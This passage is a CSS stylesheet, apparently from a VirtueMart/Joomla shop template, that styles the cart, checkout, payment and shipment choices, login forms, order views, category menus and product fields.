.sectiontableentry1 td .selected_shipment span.vmpayment_name,
.sectiontableentry1 td .selected_payment span.vmpayment_name {
  font-size: 100%;
  text-align: left;
  margin: 0;
}
.sectiontableentry1 td .selected_shipment span.vmshipment_description,
.sectiontableentry1 td .selected_payment span.vmshipment_description {
  font-size: 90%;
  text-align: left;
  padding-left: 8px;
}
.sectiontableentry1 td .selected_shipment span.vmpayment_description,
.sectiontableentry1 td .selected_payment span.vmpayment_description {
  font-size: 90%;
  text-align: left;
  padding-left: 8px;
  color: #000000;
}
.sectiontableentry1 td .selected_shipment .vmpayment_description,
.sectiontableentry1 td .selected_payment .vmpayment_description {
  font-size: 100%;
  text-align: left;
  margin: 0;
}
.sectiontableentry1 td .selected_shipment + span,
.sectiontableentry1 td .selected_payment + span {
  margin: 0 auto;
}
.sectiontableentry1 td h3.vm-shipment-header-selected,
.sectiontableentry1 td h3.vm-payment-header-selected {
  font-size: 120%;
  margin: 30px auto 25px;
}
.sectiontableentry1 td .vm-shipment-select span,
.sectiontableentry1 td .vm-payment-select span {
  display: block;
  clear: both;
}
.sectiontableentry1 td .vm-shipment-select span.fee,
.sectiontableentry1 td .vm-payment-select span.fee {
  display: block;
  clear: both;
  margin: 5px auto 10px;
}
.sectiontableentry1 td .vm-payment-select {
  text-align: center;
  color: #000000;
}
.sectiontableentry1 td .vm-payment-select .vmpayment_description {
  line-height: 18px;
  font-size: 75%;
  color: #000000;
  margin: 0 auto 10px;
  opacity: 1;
}
.sectiontableentry1 td .vmCartShipmentLogo,
.sectiontableentry1 td .vmCartPaymentLogo {
  text-align: center;
  margin: 0 auto;
}
.sectiontableentry1 td .vmCartShipmentLogo img,
.sectiontableentry1 td .vmCartPaymentLogo img {
  max-width: 180px;
  max-height: 70px;
  margin: 5px auto;
}
.sectiontableentry1 td .vmCartShipmentLogo + span,
.sectiontableentry1 td .vmCartPaymentLogo + span {
  margin: 0 auto;
}
.sectiontableentry1 td .vmCartPaymentLogo + span {
  display: none;
}
.sectiontableentry1 td a.change-payment {
  display: block;
  margin: 10px auto 0;
  width: auto;
  font-size: 90%;
}
.sectiontableentry1 td a.change-payment:after {
  font-family: 'peIcon7';
  content: "\e68e";
  font-size: 135%;
  line-height: 1;
  vertical-align: middle;
  padding-left: 7px;
}
#customer_note_field {
  width: 100% !important;
  min-height: 100px;
}
.vmpayment_name + span {
  font-size: 80%;
  color: #f14833;
  font-weight: normal;
}
.cart-view .vm-head,
.cart-view .vm-cart-header {
  padding: 10px 0;
}
.cart-view .vm-head h1,
.cart-view .vm-cart-header h1 {
  font-size: 240%;
  padding: 5px 0;
  margin: 0;
}
.cart-view .jumbotron .btn i {
  margin: -4px 10px 0 -5px;
}
.cart-view .vm-continue-shopping .btn-continue {
  display: block;
  margin: 20px auto;
}
.cart-view .vm-continue-shopping .btn-continue i.pe {
  margin: -2px 0 0 0;
  line-height: 1.2;
  font-size: 115%;
  text-align: center;
  vertical-align: middle;
}
.cart-view .vm-continue-shopping .btn-continue .continue_link {
  padding: 8px 12px;
}
.cart-view input,
.cart-view textarea,
.cart-view input[type="text"] {
  -webkit-box-shadow: none;
  box-shadow: none;
  border-radius: 0;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background: #e7e7ea;
  border: none;
  border-radius: 3px;
  margin-left: 20px;
  padding: 5px 10px;
  -webkit-transition: all .3s;
  -moz-transition: all .3s;
  -o-transition: all .3s;
  transition: all .3s;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  color: #fff;
}
.cart-view input[name="changeShopper"] {
  position: relative;
  top: -16px;
  left: 10px;
}
.cart-view input[value="Search in shop"] {
  margin: 0 !important;
}
.cart-view .chzn-container-single {
  margin-left: 30px;
}
.cart-view .chzn-container-single .chzn-single {
  height: 35px;
  margin-top: -20px;
  line-height: 35px;
}
.cart-view fieldset.userdata p.width30 input {
  width: 100%;
}
.cart-view fieldset.userdata p.width30 input:hover,
.cart-view fieldset.userdata p.width30 input:focus {
  box-shadow: none;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  width: 60px;
  border: 0;
  padding: 5px 0;
  margin-right: 10px;
  color: #fff;
  -webkit-transition: 500ms;
  -moz-transition: 500ms;
  -o-transition: 500ms;
  transition: 500ms;
}
.cart-view fieldset.userdata #com-form-login-remember input.inputbox {
  max-width: 24px;
  vertical-align: middle;
  background: transparent;
}
.cart-view fieldset.userdata #com-form-login-remember input.inputbox:hover {
  background: transparent;
}
.cart-view .billto-shipto {
  margin: 50px 0;
  padding: 50px 0;
}
.cart-view .billto-shipto a.details {
  color: #fff;
  padding: 5px 17px;
  margin: 7px auto;
  border: 0;
  -webkit-transition: 500ms;
  -moz-transition: 500ms;
  -o-transition: 500ms;
  transition: 500ms;
}
.cart-view .billto-shipto+fieldset {
  overflow-x: scroll;
  min-width: 200px;
}
.cart-view .billto-shipto .output-shipto input {
  margin-left: 10px;
}
.cart-view .billto-shipto .output-shipto .controls label {
  padding-left: 20px;
}
.cart-view .billto-shipto .output-shipto .controls input {
  margin-left: -20px;
}
.cart-view .cart-summary .vmCartPaymentLogo {
  margin-right: 10px;
}
.cart-view .cart-summary .vmCartPaymentLogo img {
  display: inline-block;
}
.cart-view table.cart-summary {
  border: 1px solid #f5f5f5;
  border-top: 0 none;
}
.cart-view table.cart-summary th,
.cart-view table.cart-summary td {
  border-top: 1px solid #f5f5f5;
  padding: 0;
}
.cart-view table.cart-summary tr {
  padding: 0;
}
.cart-view table.cart-summary tr th {
  text-align: center;
  text-transform: uppercase;
  padding: 8px 2px;
  color: #fff;
  font-size: 90%;
}
.cart-view table.cart-summary tr th .priceColor2 {
  color: #fff;
}
.cart-view table.cart-summary tr td .priceColor2 {
  color: #333;
}
.cart-view table.cart-summary tr.sectiontableentry1 td,
.cart-view table.cart-summary tr.sectiontableentry2 td {
  border-right: 1px solid #e9e9e9;
  vertical-align: middle;
  padding: 25px 10px;
  text-align: center;
}
.cart-view table.cart-summary tr.sectiontableentry2 td {
  background: #f2f2f2;
}
.cart-view table.cart-summary tr.sectiontableentry2 td input.coupon {
  border-radius: 4px;
  width: 68%;
  line-height: 44px;
  height: 44px;
  font-weight: bold;
  font-size: 1.1em;
}
.cart-view table.cart-summary tr.sectiontableentry2 td .details-button > input.details-button {
  border: 0;
  padding: 10px 5%;
  color: #fff;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.cart-view table.cart-summary tr.sectiontableentry2.last td {
  border-bottom: 1px solid #f5f5f5;
  background: none;
}
.cart-view table.cart-summary tr.sectiontableentry2.last td.cart-total {
  text-align: right;
  text-transform: uppercase;
  font-weight: 700;
  border-bottom: none;
}
.cart-view table.cart-summary input.details-button {
  color: #fff;
  padding: 5px 10px;
  border: 0;
}
.cart-view table.cart-summary .cart-images {
  padding: 0;
  margin: 0;
}
.cart-view table.cart-summary .cart-images img {
  max-width: 80px;
}
.cart-view table.cart-summary .cart-images + a {
  display: table;
  padding: 0;
  margin: 15px auto 0;
}
.cart-view table.cart-summary input.quantity-input {
  margin: 0 1px;
  border-radius: 4px 0 0 4px;
}
.cart-view table.cart-summary .btn {
  box-shadow: none;
  border: 0 none;
  text-shadow: none;
}
.cart-view table.cart-summary .input-append {
  margin: 0;
}
.cart-view table.cart-summary .input-append input[type="text"] {
  background: #f7f7f7;
  border: 1px solid #e0e0e0;
  min-height: 35px;
}
.cart-view table.cart-summary .input-append input:hover,
.cart-view table.cart-summary .input-append input:focus {
  box-shadow: none;
}
.cart-view table.cart-summary input[type="text"] {
  line-height: 28px;
  min-height: 28px;
  width: 32px;
  text-align: center;
  padding: 0;
  display: inline;
  margin: 0;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  width: 32px;
  height: inherit;
  padding: 0;
  color: #fff;
  margin: 0;
}
.cart-view table.cart-summary .vm2-add_quantity_cart > i {
  width: 26px;
  color: #fff;
  display: inline-block;
  font-size: 15px;
  line-height: 35px;
}
.cart-view table.cart-summary .vm2-remove_from_cart {
  width: 32px;
  line-height: 35px;
  min-height: 35px;
  padding: 0 5px;
  background: #f5f5f5;
  border: 1px solid #e0e0e0;
  margin: 0;
}
.cart-view table.cart-summary .vm2-remove_from_cart input:hover,
.cart-view table.cart-summary .vm2-remove_from_cart input:focus {
  box-shadow: none;
}
.cart-view table.cart-summary .vm2-remove_from_cart > i {
  width: 20px;
  height: 20px;
  color: #555;
  display: inline-block;
  font-size: 15px;
  vertical-align: middle;
}
.cart-view .checkout-button-top {
  display: block;
  margin: 10px 0;
  float: left;
  border: 0;
}
.cart-view .checkout-button-top .vm-button-correct,
.cart-view .checkout-button-top .vm-button {
  border: none;
  padding: 2px 25px;
  font-size: 15px;
  min-width: 100px;
  height: 44px;
  border-radius: 4px;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.cart-view .checkout-button-top .vm-button-correct >span,
.cart-view .checkout-button-top .vm-button >span {
  line-height: 1.8;
  font-weight: normal;
  color: #fff;
  letter-spacing: normal;
}
.vm-fieldset-tos span.cart.tos {
  margin-right: 4px;
}
.vm-fieldset-tos div.terms-of-service label {
  margin-left: 15px;
}
.vm-fieldset-tos div.terms-of-service label a#terms-of-service i {
  margin: 0 3px;
}
form.vm-form-login {
  background-color: #eee;
  border-radius: 4px;
  padding: 20px 25px;
  margin: 20px auto;
}
form.vm-form-login p {
  margin: 0 auto;
}
form.vm-form-login fieldset.userdata {
  margin: 0;
}
form.vm-form-login fieldset.userdata #com-form-login-remember input {
  width: auto !important;
  padding-left: 32px;
  padding-right: 32px;
}
form.vm-form-login .forgot {
  margin: 10px 0 0 0;
  width: 100%;
  display: block;
}
form.vm-form-login .forgot .inputbox {
  margin-bottom: 10px;
}
#com-form-login .width30 {
  display: inline-block;
  margin: 4px 6px 4px 0 !important;
}
#com-form-login-username,
#com-form-login-password {
  margin-bottom: 5px;
  width: 25%;
}
#com-form-login-username input,
#com-form-login-password input {
  border-radius: 4px;
  box-shadow: none;
}
#com-form-login-remember {
  width: auto;
}
#com-form-login-remember input.default {
  color: #fff;
  padding: 5px 20px;
  border: 0;
  border-radius: 4px;
  min-width: 130px;
}
.control-buttons {
  text-align: inherit !important;
  margin: 25px 0;
  clear: both;
}
.control-buttons .register_btns {
  width: 100%;
  display: block;
  clear: both;
}
.control-buttons .vm-button-correct {
  font-size: 16px;
  padding: 6px 32px;
  letter-spacing: normal;
  font-weight: normal;
  line-height: 1.4;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.control-buttons .vm-button-correct:before {
  font-family: 'peIcon7';
  content: "\e66c";
  font-size: 110%;
  line-height: 1.4;
  vertical-align: top;
  margin: -2px 8px 0 -8px;
}
.control-buttons button.default {
  color: #fff;
  padding: 5px 15px;
  margin: 20px 1px;
  border: 0;
}
#com-form-login-remember input.default {
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.control-buttons button.default {
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
span.userfields_info {
  display: block;
  margin: 20px auto 25px;
  width: 100%;
  line-height: 1.7;
  padding: 12px 15px;
}
#shipmentForm {
  padding: 20px;
}
table.user-details {
  width: 100%;
}
table.user-details tr td label {
  min-width: 200px;
  text-align: right;
  padding-right: 12px;
}
table.user-details tr td label,
table.user-details tr td input,
table.user-details tr td select {
  margin-bottom: 8px !important;
  margin-top: 3px !important;
}
table.user-details tr td input {
  min-width: 50%;
  width: auto;
  box-shadow: none;
  background: transparent;
}
table.user-details tr td input:hover {
  background: transparent;
}
table.user-details tr td input:hover,
table.user-details tr td input:focus,
table.user-details tr td input.invalid {
  box-shadow: none;
  background: transparent;
}
table.user-details tr td .chzn-container-single .chzn-single {
  line-height: 34px !important;
  height: 35px !important;
  margin: 3px auto;
}
.select_vm_wrap .vm-select .vm-payment-plugin-single,
.select_vm_wrap .vm-select .vm-shipment-plugin-single {
  margin: 12px;
  line-height: 38px;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
}
.select_vm_wrap .vm-select .vm-payment-plugin-single input,
.select_vm_wrap .vm-select .vm-shipment-plugin-single input {
  top: 0;
  position: relative;
}
.select_vm_wrap .vm-select label span.vmpayment,
.select_vm_wrap .vm-select label span.vmshipment {
  float: left;
  text-align: center;
  margin-left: 5px;
  position: relative;
  vertical-align: middle;
}
.select_vm_wrap .vm-select label span.vmpayment .vmpayment_name,
.select_vm_wrap .vm-select label span.vmshipment .vmpayment_name {
  line-height: 40px;
}
.select_vm_wrap .vm-select label span.vmpayment span.vmCartPaymentLogo,
.select_vm_wrap .vm-select label span.vmpayment span.vmCartShipmentLogo,
.select_vm_wrap .vm-select label span.vmshipment span.vmCartPaymentLogo,
.select_vm_wrap .vm-select label span.vmshipment span.vmCartShipmentLogo {
  text-align: center;
}
.select_vm_wrap .vm-select label span.vmpayment span.vmCartPaymentLogo >img,
.select_vm_wrap .vm-select label span.vmpayment span.vmCartShipmentLogo >img,
.select_vm_wrap .vm-select label span.vmshipment span.vmCartPaymentLogo >img,
.select_vm_wrap .vm-select label span.vmshipment span.vmCartShipmentLogo >img {
  text-align: center;
  margin: 0 auto;
  max-width: 140px;
  max-height: 65px;
}
.vm-order-done .post_payment_payment_name {
  margin: 25px auto;
}
.vm-order-done .post_payment_payment_name img {
  margin: 15px auto;
  text-align: center;
  max-width: 130px;
  max-height: 70px;
}
.vm-order-done .post_payment_order_total {
  margin: 25px auto 35px;
  font-weight: bold;
}
.vm-order-done .post_payment_order_total span {
  font-weight: normal;
}
.vm-order-done .vm-button-correct {
  padding: 7px 35px;
  font-weight: normal;
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
  color: #fff;
}
.vm-order-done .vm-button-correct:hover,
.vm-order-done .vm-button-correct:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.vm-orders-information .btn-default {
  margin: 0;
}
.vm-orders-information h2 {
  margin: 20px auto 40px;
}
.vm-orders-information h2 a {
  margin: 0 12px;
}
.vm-orders-information h2 a i.pe {
  font-size: 85%;
}
.vm-orders-information .vm-orders-order {
  margin: 40px auto;
}
.vm-orders-information .vm-orders-order img {
  margin: 15px 0;
  max-width: 130px;
  max-height: 70px;
}
.vm-orders-information .vm-orders-items ul#tabs li {
  line-height: 32px;
  padding: 5px 25px 7px !important;
  border-radius: 4px 4px 0 0;
  margin: 25px 2px 0 0;
}
.vm-orders-information .vm-orders-items ul#tabs li.current {
  color: #fff !important;
  background-color: rgba(241,72,51,0.9) !important;
}
.vm-orders-information .vm-orders-items .tabs {
  border: 1px solid #ccc;
  border-radius: 4px;
  padding: 20px;
}
.product-price {
  display: block;
}
.product-price .vm-price-desc,
.product-price .vm-price-desc+span {
  margin: 0 !important;
}
.orderby-displaynumber {
  border: none;
  margin: 0 auto;
  padding: 10px 0 30px 0;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  cursor: pointer;
  -webkit-transition: all .5s ease-in-out;
  transition: all .5s ease-in-out;
  border-radius: 3px;
  padding: 0;
  margin: 0;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title {
  display: inline-block;
  padding: 5px 8px 5px 15px;
  font-size: 14px;
  -webkit-transition: all .5s ease-in-out;
  transition: all .5s ease-in-out;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  font-family: "peIcon7";
  content: "\e659";
  margin: 0 auto;
  padding: 0 8px 0 0;
  font-size: 17px;
  line-height: 1.5;
  vertical-align: top;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .activeOrder,
.orderby-displaynumber .vm-order-list .orderlistcontainer .Order {
  background-image: none;
  display: inline-block;
  border: none;
  padding: 0 15px 0 0;
  font-size: 14px;
  position: relative;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  -webkit-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
  border: 0;
  border-radius: 0 0 4px 4px;
  cursor: pointer;
  visibility: hidden;
  opacity: 0;
  display: block;
  margin-top: -10px;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div {
  padding: 0;
  margin: 0;
  width: 170px;
  -webkit-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  padding: 5px 15px;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div:hover {
  background: #f0f0f0;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer:hover .orderlist {
  opacity: 1;
  display: block;
  visibility: visible;
  margin-top: 1px;
}
.orderby-displaynumber .display-number {
  margin: 0;
  padding: 5px;
  text-align: right;
  font-size: 14px;
}
.orderby-displaynumber .display-number >span {
  margin: 0 10px 0 0;
  text-align: right;
  float: left;
  line-height: 2;
}
.orderby-displaynumber .display-number select {
  max-width: 60px;
  text-align: left;
}
.orderby-displaynumber .display-number .chzn-container-single,
.orderby-displaynumber .display-number .chzn-single {
  max-width: 60px;
  text-align: left;
  display: block;
  margin: -3px 0 0;
}
.sp-module-content ul.VMmenu li {
  padding: 0;
  display: block;
  position: relative;
}
.sp-module-content ul.VMmenu li a {
  display: block;
  padding: 2px 12px;
  line-height: 36px;
  border: 0;
}
.sp-module-content ul.VMmenu li a >.nmb_products {
  padding: 1px 6px;
  margin: 0 3px;
  color: #555;
  font-size: 85%;
  text-align: center;
  background-color: #fff;
  border: 1px solid #eee;
  border-radius: 3px;
}
.sp-module-content ul.VMmenu li a:hover {
  background-color: #f9f9f9;
}
.sp-module-content ul.VMmenu li:hover > a >.nmb_products {
  background-color: #fff;
  border: 1px solid #eee;
}
.sp-module-content ul.VMmenu li .vmmenu-toggler {
  display: inline-block;
  position: absolute;
  top: 0;
  right: 0;
  padding-right: 10px;
  width: 33%;
  line-height: 41px;
  cursor: pointer;
}
.sp-module-content ul.VMmenu li .vmmenu-toggler .open-icon {
  padding-left: calc(90%);
}
.sp-module-content ul.VMmenu li .vmmenu-toggler .open-icon {
  text-align: center;
  color: #777;
}
.sp-module-content ul.VMmenu li .vmmenu-toggler .open-icon:before {
  line-height: 32px;
  text-align: center;
  position: absolute;
  right: 10px;
  top: 5px;
  -webkit-transform: rotate(180deg);
  transform: rotate(180deg);
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
.sp-module-content ul.VMmenu li .vmmenu-toggler.collapsed .open-icon:before {
  -webkit-transform: rotate(0deg);
  transform: rotate(0deg);
}
.sp-module-content ul.VMmenu li ul li {
  padding: 0;
}
.sp-module-content ul.VMmenu li ul li a {
  text-indent: 10px;
  box-shadow: inset 0 1px 0px rgba(62,62,62,0.1);
}
.sp-module-content ul.VMmenu li ul li a >.nmb_products {
  padding: 1px 6px;
  margin: 0 5px;
}
.sp-module-content ul.VMmenu li ul ul li a {
  text-indent: 20px;
}
.sp-module-content ul.VMmenu li.active > a {
  background-color: #f9f9f9;
  color: #f14833;
}
.sp-module-content ul.VMmenu li.active ul > li.active > a {
  background-color: #f9f9f9;
  color: #f14833;
}
.flex-search input#mod_virtuemart_search {
  width: 100%;
  border-radius: 4px;
}
.flex-search input#mod_virtuemart_search:focus {
  box-shadow: none;
}
.searched-word {
  color: #aaa;
  line-height: 1.5;
}
.vm-flex-search input {
  min-width: 250px;
  border-radius: 4px;
  z-index: 1;
  float: left;
  -webkit-transition: 300ms;
  transition: 300ms;
}
.vm-flex-search input:focus {
  box-shadow: none;
}
.vm-flex-search input:focus + .vm-search-button {
  box-shadow: inset 1px 0 0px #e3e3e3;
}
.vm-flex-search .vm-search-button {
  position: absolute;
  display: inline-block;
  margin: 1px 0 0 -42px;
  z-index: 2;
  width: 40px;
  height: 32px;
  background: transparent;
  border: 0;
  outline: 0;
  box-shadow: inset 1px 0 0px #f3f3f3;
}
.vm-flex-search .vm-search-button >i {
  width: 40px;
  line-height: 2;
  padding-left: 3px;
  text-align: center;
  vertical-align: middle;
  opacity: 0.9;
}
.currency-selector-module {
  width: 100%;
}
.currency-selector-module select {
  display: inline-block;
  width: 75%;
}
.currency-selector-module button.btn,
.currency-selector-module input.btn {
  padding: 0;
  margin: 0;
  display: inline-block;
  border: 1px solid rgba(83,83,83,0.34);
  width: 20%;
  vertical-align: top;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  padding: 5px 7px 5px 7px;
  margin: 0;
  line-height: 22px;
  width: 30px;
  text-align: center;
}
.chzn-container {
  min-width: 50%;
}
.chzn-container .chzn-single {
  line-height: 32px !important;
  height: 33px !important;
}
.chzn-container .chzn-single div {
  top: 2px !important;
}
.chzn-container-active.chzn-with-drop .chzn-single {
  border: 1px solid #aaa !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li {
  line-height: 18px !important;
}
.quantity-box input {
  width: 24px;
  height: 24px;
  padding: 0;
  margin: 0;
  left: 0;
  background: rgba(0,0,0,0.05);
  border: 1px solid #e0e0e0 !important;
}
.quantity-box input:hover {
  background: rgba(0,0,0,0.04) !important;
}
.default-style .product-single-style {
  text-align: center;
  border-bottom: none;
}
.default-style .product-single-style .spacer h3 {
  font-size: 125%;
  margin: 20px auto 15px;
}
.default-style .product-single-style .spacer .PricesalesPrice {
  margin: 15px auto;
  font-size: 125%;
  text-align: center;
}
.default-style .addtocart-area {
  margin: 10px auto;
}
.default-style .addtocart-area .addtocart-bar {
  margin: 0 auto;
  display: block;
  text-align: center;
}
.default-style .addtocart-area .addtocart-bar button.add-to-cart {
  font-size: 105%;
}
.default-style .product_list .spacer .spacer-img {
  padding: 3.9%;
}
.singleview .product-single-style .spacer .product-image {
  padding: 0 10px;
}
.singleview .product-single-style .spacer .spacer-inner {
  padding: 1% 3%;
}
.singleview .product-single-style .spacer .spacer-inner .PricesalesPrice {
  margin-top: 20px;
  font-size: 130%;
}
.singleview .product-single-style .spacer .spacer-inner .addtocart-area .cd-customization {
  font-size: 100%;
}
.singleview .product-single-style .spacer .spacer-inner .addtocart-area .cd-customization button.add-to-cart {
  height: 35px;
  width: 130px;
}
.singleview .product-single-style .spacer .spacer-inner .addtocart-area .cd-customization button.add-to-cart >input {
  line-height: 35px;
}
.vmgroup .vm-product {
  display: block;
}
.vmgroup .vm-product.productdetails li {
  text-align: initial;
  padding: 15px 0 8px;
  border-bottom: 1px solid #e5e5e5;
}
.vmgroup .vm-product.productdetails li .spacer-img {
  width: 33%;
  display: inline-block;
  margin: 0 auto;
  border: 1px solid rgba(50,50,50,0.15);
  overflow: hidden;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
  opacity: 0.9;
}
.vmgroup .vm-product.productdetails li .spacer-img img {
  width: 100%;
  height: 80px;
  object-fit: cover;
}
.vmgroup .vm-product.productdetails li .spacer-img:hover {
  opacity: 1;
}
.vmgroup .vm-product.productdetails li .spacer-inner {
  width: 64%;
  display: inline-block;
  vertical-align: top;
  padding: 0 10px;
  margin: 0;
}
.vmgroup .vm-product.productdetails li .spacer-inner h5 {
  display: block;
  width: 100%;
  font-size: 110%;
  padding: 0;
  margin: 0;
  line-height: 1.4;
}
.vmgroup .vm-product.productdetails li .spacer-inner .PricesalesPrice {
  margin: 8px auto;
  font-size: 18px;
}
.vmgroup hr.divider {
  margin: 10px auto;
  border: none;
  box-shadow: none;
}
.vmgroup .addtocart-area {
  display: block;
  clear: both;
  width: 100%;
  margin: 0 auto;
}
.vmgroup .addtocart-area .addtocart-bar {
  display: block;
  margin: 0 auto 5px;
  padding: 0;
}
.vmgroup .addtocart-area .addtocart-bar .calculate {
  display: table;
  left: 0;
  margin: 5px 8px 0 0;
  width: 44px;
  padding: 0;
  float: left;
}
.vmgroup .addtocart-area .addtocart-bar .calculate label {
  display: none;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-box {
  padding: 0;
  margin-left: 0;
  font-size: 80%;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-box input {
  width: 22px;
  height: 22px;
  padding: 0;
  margin: 0;
  left: 0;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls {
  background-image: none;
  margin: 0 0 0 -3px;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  display: block;
  position: absolute;
  z-index: 2;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  width: 20px;
  height: 16px;
  margin: -16px 0 0 0;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa {
  color: #999;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far {
  color: #999;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  margin: 0 0 0 0;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa {
  color: #999;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far {
  color: #999;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fas,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .far {
  position: absolute;
  z-index: 1;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up {
  margin: -13px 0 0 3px;
}
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.vmgroup .addtocart-area .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down {
  margin: 0 0 0 3px;
}
.vmgroup .addtocart-area .addtocart-bar .cd-customization {
  width: auto;
  display: table;
  font-size: 75%;
}
.vmgroup .addtocart-area .addtocart-bar .cd-customization button.add-to-cart {
  height: 32px;
  width: 100px;
  display: block;
}
.vmgroup .addtocart-area .addtocart-bar .cd-customization button.add-to-cart >input {
  line-height: 28px;
}
.vm-shipment-select,
.vm-payment-select {
  padding: 0;
}
.vm-shipment-select div,
.vm-payment-select div {
  padding: 1%;
  margin: 0 0 7px 0;
}
.vm-shipment-select div input[type="radio"],
.vm-payment-select div input[type="radio"] {
  display: none;
}
.vm-shipment-select div input[type="radio"]:checked + label,
.vm-payment-select div input[type="radio"]:checked + label {
  border: 1px solid rgba(241,72,51,0.9);
  box-shadow: 0 1px 5px rgba(241,72,51,0.2);
}
.vm-shipment-select div label,
.vm-payment-select div label {
  display: block;
  text-align: center;
  margin: 0 auto;
  line-height: 18px;
  cursor: pointer;
  border: 1px solid transparent;
  padding: 10px;
  border-radius: 4px;
  -webkit-transition: all 300ms ease-in-out;
  -moz-transition: all 300ms ease-in-out;
  -o-transition: all 300ms ease-in-out;
  transition: all 300ms ease-in-out;
}
.vm-shipment-select div label:hover,
.vm-payment-select div label:hover {
  border: 1px solid rgba(25,25,25,0.1);
}
.category-view .product-fields .product-field {
  text-align: center;
}
.product-fields .product-field {
  margin: 0 auto;
}
.product-fields span.hasTooltip {
  width: auto;
  height: auto;
  padding: 4px 4px 0;
  display: inline-block;
  margin-bottom: -2px;
}
.product-fields span.hasTooltip img {
  margin: 0 auto;
  display: table;
  float: none;
}
.product-fields .product-field-display {
  margin: 10px auto 10px;
}
.product-fields .product-field-display label {
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  cursor: pointer;
  margin: 0 5px 5px 0;
  display: inline-block;
}
.product-fields .product-field-display label input.form-radio {
  -webkit-appearance: none;
  -moz-appearance: none;
  appearance: none;
  display: none;
  height: 0;
  width: 0;
  border: 0;
  opacity: 0;
  outline: none;
}
.product-fields .product-field-display label span.checker,
.product-fields .product-field-display label span.checker-select {
  line-height: 25px;
  display: block;
  float: right;
  border: 1px solid #ccc;
  color: #595959;
  padding: 4px 18px;
  border-radius: 4px;
}
.product-fields .product-field-display label span.checker-select {
  background: #f3f3f3;
  padding: 4px 35px;
}
.product-fields .product-field-display label input.form-radio:hover + span.checker {
  border: 1px solid #999;
}
.product-fields .product-field-display label input.form-radio:checked + span.checker {
  color: #e2270f;
  border: 1px solid #e2270f;
  padding-left: 22px;
  opacity: 1;
}
.product-fields .product-field-display label input.form-radio + span.checker::before {
  opacity: 0;
  content: '';
  transform: rotate(30deg) scale(0);
  -webkit-transition: all .5s ease;
  -moz-transition: all .5s ease;
  -o-transition: all .5s ease;
  transition: all .5s ease;
}
.product-fields .product-field-display label input.form-radio:checked + span.checker::before {
  position: relative;
  display: inline-block;
  left: -8px;
  top: -2px;
  content: '\02143';
  transform: rotate(40deg) scale(1);
  color: #f14833;
  font-weight: bold;
  opacity: 1;
}
.product-fields .product-field-display .vm-cmv-label {
  margin: 2px 12px 10px 0;
  display: inline-block;
  vertical-align: top;
  font-weight: bold;
  color: #555;
}
.popup-cart {
  overflow: hidden;
